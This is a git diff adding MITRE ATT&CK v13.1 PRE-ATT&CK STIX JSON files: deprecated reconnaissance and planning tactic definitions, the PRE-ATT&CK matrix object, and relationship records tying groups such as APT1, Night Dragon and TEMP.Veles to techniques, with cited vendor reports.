"x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--c6b17c99-31c1-490a-8b2b-a79502d6131b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Organizational Weakness Identification", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0020/).\n\nOrganizational weakness identification consists of identifying and analyzing weaknesses and vulnerabilities from the intelligence gathering phases which can be leveraged to gain access to target or intermediate target organizations of interest.", + "external_references": [ + { + "external_id": "TA0020", + "url": "https://attack.mitre.org/tactics/TA0020", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "organizational-weakness-identification", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:36:16.863Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--d90bd741-2edb-4e74-8a6f-435143ad7bbb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "People Information Gathering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0016/).\n\nPeople Information Gathering consists of the process of identifying critical personnel elements of intelligence an adversary will need about a target in order to best attack.\u00a0 People intelligence gathering focuses on identifying key personnel or individuals with critical accesses in order to best approach a target for attack.\u00a0 It may involve aspects of social engineering, elicitation, mining social media sources, or be thought of as understanding the personnel element of competitive intelligence.", + "external_references": [ + { + "external_id": "TA0016", + "url": "https://attack.mitre.org/tactics/TA0016", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "people-information-gathering", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:34:26.736Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--f30c2753-e6b2-4186-818d-99b8b1a0322b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "People Weakness Identification", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0019/).\n\nPeople weakness identification consists of identifying and analyzing weaknesses and vulnerabilities from the intelligence gathering phases which can be leveraged to gain access to target or intermediate target persons of interest or social trust relationships.", + "external_references": [ + { + "external_id": "TA0019", + "url": "https://attack.mitre.org/tactics/TA0019", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "people-weakness-identification", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:35:52.355Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--d3909f10-8193-4a94-9bbb-1f2d5cb2373e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Persona Development", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0023/).\n\nPersona development consists of the development of public information, presence, history and appropriate affiliations. 
This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.", + "external_references": [ + { + "external_id": "TA0023", + "url": "https://attack.mitre.org/tactics/TA0023", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "persona-development", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:37:42.444Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--0f0ff9a7-3c8d-4af6-8e45-f6d359553ffd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Priority Definition Direction", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0013/).\n\nPriority definition direction consists of the process of collecting and assigning requirements for meeting Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ) as determined by leadership.", + "external_references": [ + { + "external_id": "TA0013", + "url": "https://attack.mitre.org/tactics/TA0013", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "priority-definition-direction", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:32:47.554Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--b2a086f2-d3db-408b-b4d4-e09a1c84f940", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Priority Definition Planning", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0012/).\n\nPriority definition planning consists of the process of determining the set of Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ) required for meeting key strategic, operational, or tactical goals. Leadership outlines the priority definition (may be considered a goal) around which the adversary designs target selection and a plan to achieve. 
An analyst may outline the priority definition when in the course of determining gaps in existing KITs or KIQs.", + "external_references": [ + { + "external_id": "TA0012", + "url": "https://attack.mitre.org/tactics/TA0012", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "priority-definition-planning", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:31:37.810Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--d8c84771-a3fa-4f64-914e-4db3a2be2607", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Stage Capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0026/).\n\nStaging capabilities consists of preparing operational environment required to conduct the operation. This includes activities such as deploying software, uploading data, enabling command and control infrastructure.", + "external_references": [ + { + "external_id": "TA0026", + "url": "https://attack.mitre.org/tactics/TA0026", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "stage-capabilities", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:38:57.122Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--84f3ed3d-c72f-45d8-a3b8-4c18c2b188e6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Target Selection", + "description": "This object is deprecated as its content has been merged into the enterprise domain. 
Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0014/).\n\nTarget selection consists of an iterative process in which an adversary determines a target by first beginning at the strategic level and then narrowing down operationally and tactically until a specific target is chosen.\u00a0 A target may be defined as an entity or object that performs a function considered for possible engagement or other action.", + "external_references": [ + { + "external_id": "TA0014", + "url": "https://attack.mitre.org/tactics/TA0014", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "target-selection", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:33:25.361Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--0abac415-7b49-4085-93b3-662ba1258b4b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Technical Information Gathering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0015/).\n\nTechnical information gathering consists of the process of identifying critical technical elements of intelligence an adversary will need about a target in order to best attack.\u00a0 Technical intelligence gathering includes, but is not limited to, understanding the target's network architecture, IP space, network services, email format, and security procedures.", + "external_references": [ + { + "external_id": "TA0015", + "url": "https://attack.mitre.org/tactics/TA0015", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "technical-information-gathering", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:33:53.838Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--97689bbd-d5c4-4293-bde7-f11750cea2ec", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Technical Weakness Identification", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0018/).\n\nTechnical weakness identification consists of identifying and analyzing weaknesses and vulnerabilities collected during the intelligence gathering phases to determine best approach based on technical complexity and adversary priorities (e.g., expediency, stealthiness).", + "external_references": [ + { + "external_id": "TA0018", + "url": "https://attack.mitre.org/tactics/TA0018", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "technical-weakness-identification", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:35:24.309Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--bc5c0e21-7c93-4809-a01e-249bcc42b0a2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test Capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0025/).\n\nTesting capabilities takes place when adversaries may need to test capabilities externally to refine development goals and criteria and to ensure success during an operation. 
Certain testing may be done after a capability is staged.", + "external_references": [ + { + "external_id": "TA0025", + "url": "https://attack.mitre.org/tactics/TA0025", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "test-capabilities", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:38:29.580Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-matrix--2e2c97c3-1908-4e2d-a711-a27d3859eb1d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "PRE-ATT&CK", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/matrices/pre/).\n\nBelow are the tactics and techniques representing the MITRE PRE-ATT&CK Matrix.", + "external_references": [ + { + "external_id": "pre-attack", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/matrices/pre" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "x-mitre-matrix", + "tactic_refs": [ + "x-mitre-tactic--b2a086f2-d3db-408b-b4d4-e09a1c84f940", + "x-mitre-tactic--0f0ff9a7-3c8d-4af6-8e45-f6d359553ffd", + "x-mitre-tactic--84f3ed3d-c72f-45d8-a3b8-4c18c2b188e6", + "x-mitre-tactic--0abac415-7b49-4085-93b3-662ba1258b4b", + "x-mitre-tactic--d90bd741-2edb-4e74-8a6f-435143ad7bbb", + "x-mitre-tactic--b9f8a273-6167-47cb-89e6-02774d067e24", + "x-mitre-tactic--97689bbd-d5c4-4293-bde7-f11750cea2ec", + "x-mitre-tactic--f30c2753-e6b2-4186-818d-99b8b1a0322b", + "x-mitre-tactic--c6b17c99-31c1-490a-8b2b-a79502d6131b", + "x-mitre-tactic--4652199e-eef5-4523-bd18-2b5070f56cd8", + "x-mitre-tactic--2289489d-8824-42fb-8c94-411aca6f664c", + 
"x-mitre-tactic--d3909f10-8193-4a94-9bbb-1f2d5cb2373e", + "x-mitre-tactic--d849365b-3496-4e5c-b599-019da1b35266", + "x-mitre-tactic--bc5c0e21-7c93-4809-a01e-249bcc42b0a2", + "x-mitre-tactic--d8c84771-a3fa-4f64-914e-4db3a2be2607" + ], + "modified": "2020-10-22T15:43:48.844Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "type": "marking-definition", + "id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-06-01T00:00:00Z", + "definition_type": "statement", + "definition": { + "statement": "Copyright 2015-2020, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation." + } + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--0adf353d-688b-46ce-88bb-62a008675fe0.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--0adf353d-688b-46ce-88bb-62a008675fe0.json new file mode 100644 index 0000000000000000000000000000000000000000..2cf709c74da122c6efb594bb2c0ea7d2b1ad65b6 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--0adf353d-688b-46ce-88bb-62a008675fe0.json 
@@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--5d38c19d-0603-4ba5-822a-64ef7fc8afb2", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--0adf353d-688b-46ce-88bb-62a008675fe0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) used servers in China, the U.S., and the Netherlands in an attempt to hide their operations.(Citation: McAfee Night Dragon)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. Retrieved February 19, 2018.", + "url": "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + } + ], + "source_ref": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", + "relationship_type": "uses", + "target_ref": "attack-pattern--286cc500-4291-45c2-99a1-e760db176402", + "type": "relationship", + "modified": "2019-03-25T14:36:29.818Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--0e52753e-0a02-4bec-88f9-f8ee21b46bae.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--0e52753e-0a02-4bec-88f9-f8ee21b46bae.json new file mode 100644 index 0000000000000000000000000000000000000000..5c78d04b97661ad03eece80052da24fbd21d768c --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--0e52753e-0a02-4bec-88f9-f8ee21b46bae.json 
@@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--075ef5d6-c757-4d6b-92bb-63f7a76360c7", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--0e52753e-0a02-4bec-88f9-f8ee21b46bae", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88", + "relationship_type": "related-to", + "target_ref": "attack-pattern--784ff1bc-1483-41fe-a172-4cd9ae25c06b" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--0e7905fd-77c8-43cb-b499-7d6e37fefbeb.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--0e7905fd-77c8-43cb-b499-7d6e37fefbeb.json new file mode 100644 index 0000000000000000000000000000000000000000..37c18e00ca639494b2e549bdbd301fc8da9d697f --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--0e7905fd-77c8-43cb-b499-7d6e37fefbeb.json 
@@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--e1fa03eb-21e8-4265-aac4-a25979e837c0", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--0e7905fd-77c8-43cb-b499-7d6e37fefbeb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT1](https://attack.mitre.org/groups/G0006) used dynamic DNS to register hundreds of FQDNs.(Citation: Mandiant APT1)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "relationship_type": "uses", + "target_ref": "attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe", + "type": "relationship", + "modified": "2019-08-20T13:08:13.554Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--1143e6a6-deef-4dbd-8c91-7bf537d8f5ce.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--1143e6a6-deef-4dbd-8c91-7bf537d8f5ce.json new file mode 100644 index 0000000000000000000000000000000000000000..64e463950664dd27ad8444e549d5aa7cd83c23ce --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--1143e6a6-deef-4dbd-8c91-7bf537d8f5ce.json 
@@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8d3dda57-1da5-43ca-8334-a5bd975103f0", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--1143e6a6-deef-4dbd-8c91-7bf537d8f5ce", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--784ff1bc-1483-41fe-a172-4cd9ae25c06b", + "relationship_type": "related-to", + "target_ref": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--1aafdefb-304e-4998-87cc-81aad295f721.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--1aafdefb-304e-4998-87cc-81aad295f721.json new file mode 100644 index 0000000000000000000000000000000000000000..ee4cc5f0d7f4a00f9a527346179db4dda3b4f031 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--1aafdefb-304e-4998-87cc-81aad295f721.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--cde4b1c6-6776-41e8-88ea-4ff9e74f5b47", + "spec_version": "2.0", + "objects": [ + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--03f4a766-7a21-4b5e-9ccf-e0cf422ab983", + "target_ref": "attack-pattern--e5164428-03ca-4336-a9a7-4d9ea1417e59", + "relationship_type": "related-to", + "id": "relationship--1aafdefb-304e-4998-87cc-81aad295f721", + "type": "relationship", + "modified": "2019-02-19T18:56:56.136Z", + "created": "2019-02-19T18:56:56.136Z" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--21842707-0f15-43bf-bc42-2bceadf2cfa2.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--21842707-0f15-43bf-bc42-2bceadf2cfa2.json new file mode 100644 index 0000000000000000000000000000000000000000..cf0d936b39cd61a59e63ef71cb850c1db5dbcc7e --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--21842707-0f15-43bf-bc42-2bceadf2cfa2.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--85bfb7bf-b003-4a3d-9f6d-ff2e04c4e559", + "spec_version": "2.0", + "objects": [ + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "target_ref": "attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c", + "external_references": [ + { + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "source_name": "FireEye TRITON 2019" + } + ], + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used dynamic DNS.(Citation: FireEye TRITON 2019)", + "relationship_type": "uses", + "id": "relationship--21842707-0f15-43bf-bc42-2bceadf2cfa2", + "type": "relationship", + "modified": "2019-04-29T18:59:16.596Z", + "created": "2019-04-24T19:45:44.212Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--22d4f32c-63c1-400f-8e2c-10e4a200d133.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--22d4f32c-63c1-400f-8e2c-10e4a200d133.json new file mode 100644 index 0000000000000000000000000000000000000000..2633043b270d2da821d250b2d26a5e55bdd7fb64 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--22d4f32c-63c1-400f-8e2c-10e4a200d133.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--34e0f2c5-6a22-49fb-a4ab-83bface05671", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--22d4f32c-63c1-400f-8e2c-10e4a200d133", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7718e92f-b011-4f88-b822-ae245a1de407", + "relationship_type": "related-to", + "target_ref": "attack-pattern--c721b235-679a-4d76-9ae9-e08921fccf84" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--28815a00-1cf4-4fbc-9039-306a9542c7fd.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--28815a00-1cf4-4fbc-9039-306a9542c7fd.json new file mode 100644 index 0000000000000000000000000000000000000000..c1a305d42c2e2f2d9410a7021985b0b8218a52b9 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--28815a00-1cf4-4fbc-9039-306a9542c7fd.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--670e7d9c-af30-4fdd-9c22-98392fa7729a", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--28815a00-1cf4-4fbc-9039-306a9542c7fd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077", + "relationship_type": "related-to", + "target_ref": "attack-pattern--e51398e6-53dc-4e9f-a323-e54683d8672b" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--28bf7e8b-9948-40a8-945b-6b5f2c78ec53.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--28bf7e8b-9948-40a8-945b-6b5f2c78ec53.json new file mode 100644 index 0000000000000000000000000000000000000000..33a0a102d51c86d506a2ade7c227c07f7d06bd7c --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--28bf7e8b-9948-40a8-945b-6b5f2c78ec53.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c55833f2-0a0a-4c64-9790-936881d1503b", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--28bf7e8b-9948-40a8-945b-6b5f2c78ec53", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a", + "relationship_type": "related-to", + "target_ref": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2b0ec032-eaca-4f0c-be55-39471f0f2bf5.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2b0ec032-eaca-4f0c-be55-39471f0f2bf5.json new file mode 100644 index 0000000000000000000000000000000000000000..7b426bb3e6fa6c1c351d9e7decfd036057a27d2c --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2b0ec032-eaca-4f0c-be55-39471f0f2bf5.json 
@@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--9357670e-8a37-4ed4-b9ee-4a4ab8361216", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--2b0ec032-eaca-4f0c-be55-39471f0f2bf5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT1](https://attack.mitre.org/groups/G0006) used publicly available privilege escalation tools.(Citation: Mandiant APT1)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "relationship_type": "uses", + "target_ref": "attack-pattern--27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768", + "type": "relationship", + "modified": "2019-08-20T13:08:13.337Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2bf984b5-1a48-4d9a-a4f2-e97801254b84.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2bf984b5-1a48-4d9a-a4f2-e97801254b84.json new file mode 100644 index 0000000000000000000000000000000000000000..a6bbb588c14fa2c5f9bffc5a3f9519da3037a7ca --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2bf984b5-1a48-4d9a-a4f2-e97801254b84.json 
@@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6d4febcb-2cd8-47a7-93ff-8a09b0c1b427", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--2bf984b5-1a48-4d9a-a4f2-e97801254b84", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6", + "relationship_type": "related-to", + "target_ref": "attack-pattern--1a295f87-af63-4d94-b130-039d6221fb11" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2d95ed6f-52e7-4708-af15-9a6c08390454.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2d95ed6f-52e7-4708-af15-9a6c08390454.json new file mode 100644 index 0000000000000000000000000000000000000000..9abe512893601ae670b5cadded6b5abba0c8a1de --- /dev/null 